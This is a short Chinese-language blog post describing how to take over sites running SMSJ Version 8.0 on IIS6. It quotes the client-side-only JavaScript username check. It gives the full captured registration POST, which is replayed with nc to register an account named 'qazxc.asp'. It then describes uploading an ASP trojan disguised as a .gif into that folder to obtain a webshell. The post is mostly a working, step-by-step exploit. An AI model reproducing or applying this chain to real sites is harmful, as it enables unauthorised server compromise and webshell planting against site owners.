最新SMSJ Version 8.0漏洞 
 

作者:rover
帮朋友检测网站的安全性，用的是SMSJ Version 8.0，号称仿阿里巴巴的东西，注册企业会员后，登录管理，发现上传图片会归类到一个http://www.rover.com/UserDocument/你注册的会员帐号/picture/的目录里不由让人浮想联翩，想起早期动易的那个注册漏洞
说起这个漏洞，完全是iis6引起的，在iis6的站点上，建立一个xx.asp的文件夹，然后在里面放一个改成gif后缀的asp木马，照样会按asp来执行，看了下服务器，八成是win2003,也就是iis6了然后我试着注册rover.asp的用户，注册那里到是过滤了特殊字符的，但是看了下，只是用简单的javascript限制的
代码如下：

function checkdata() {
if( isNumberString(addform.user.value,"1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_")!=1 || addform.user.value.length<2 || addform.user.value.length>16) {
alert("\用户注册出错，下面是产生错误的可能原因：\n\n·用户名必须是2-16位的数字、英文或下划线")
return false;ok,抓包，然后用nc提交，直接绕过

抓包内容

POST /reg_save.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, 

application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.rover.com/reg.asp?action=reg
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; 

.NET CLR 2.0.50727)
Host: www.rover.com
Content-Length: 230
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDASQCACRB=FELPBKLAJDFPOKOPFBDEKGMB; cnzz02=1; rtime=0; 

ltime=1206546036500; cnzz_eid=96831333-

user=qazxc.asp&pass=1234567&pass1=1234567&ypxxone_id=8&ypxxtwo_id=136&coname=rover&colxr=a

dmin&colxrsex=%CF%C8%C9%FA&addone_id=17&addtwo_id=490&coaddress=xxxxx&cotelq=010&cotel=384

76564&mail=icerover@msn.com&vip=3&img.x=58&img.y=17

nc ip 80成功注册，然后把asp木马改成gif后缀，当图片上传上去
http://www.rover.com/UserDocument/qazxc.asp/Picture/20080326.gif
自此得到webshell，over~最近懒的说话，懒得修饰文笔，看不懂的就一直跳过跳过...
ps:漏洞很简单，好久不写字了，纯粹憋字而已，见笑了，此外，还可以本地提交注册<-- Added by RelatedTopic, plugin for Bo-Blog 2.0.0 -->